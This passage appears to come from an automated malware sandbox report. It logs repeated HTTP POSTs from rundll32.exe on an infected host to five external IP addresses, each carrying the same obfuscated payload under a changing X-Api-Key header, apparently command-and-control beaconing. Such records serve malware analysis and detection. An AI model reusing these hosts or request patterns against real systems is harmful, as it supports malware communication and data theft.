    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    26 | 192.168.2.5 | 49739 | 91.142.74.28 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:43.060127974 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: t1wbsKRa
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    27 | 192.168.2.5 | 49740 | 77.238.224.56 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:44.796145916 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Q1bZOJDX
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    28 | 192.168.2.5 | 49742 | 77.238.229.63 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:46.391705036 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: gCfIfSYp
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    29 | 192.168.2.5 | 49743 | 77.238.250.123 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:48.004276037 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Z3b9rrsi
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:48.605667114 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:48 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    30 | 192.168.2.5 | 49745 | 195.2.70.38 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:09.880846977 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: cZHwUfDW
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    31 | 192.168.2.5 | 49746 | 195.2.70.38 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:10.950556993 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: WQ9M0udj
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    32 | 192.168.2.5 | 49747 | 91.142.74.28 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:11.644249916 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: NUd7pLSC
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    33 | 192.168.2.5 | 49748 | 91.142.74.28 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:12.686239958 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: THInzKVH
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    34 | 192.168.2.5 | 49749 | 77.238.224.56 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:13.507388115 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Jags1Yc1
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    35 | 192.168.2.5 | 49750 | 77.238.224.56 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:14.439194918 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Zw0ftNvV
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    36 | 192.168.2.5 | 49751 | 77.238.229.63 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:15.152638912 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: JVy63XJH
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    37 | 192.168.2.5 | 49752 | 77.238.229.63 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:16.102632046 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: QxLH2Zxp
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    38 | 192.168.2.5 | 49753 | 77.238.250.123 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:16.807604074 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: gKjXy6Nw
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:52:17.423316956 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:52:17 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    39 | 192.168.2.5 | 49754 | 77.238.250.123 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:17.741628885 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: uoODSQ5Q
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:52:18.350729942 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:52:18 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    40 | 192.168.2.5 | 49755 | 195.2.70.38 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:18.608309031 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: MrJxAEK9
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    41 | 192.168.2.5 | 49756 | 91.142.74.28 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:20.361051083 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: CKG9Esl2
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    42 | 192.168.2.5 | 49757 | 77.238.224.56 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:22.400051117 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: DP3CY4a4
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    43 | 192.168.2.5 | 49758 | 77.238.229.63 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:24.002881050 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: mtIZ0YXy
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    44 | 192.168.2.5 | 49759 | 77.238.250.123 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:25.649348974 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: ZslkkrvB
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:52:26.279187918 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:52:26 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    45 | 192.168.2.5 | 49760 | 195.2.70.38 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
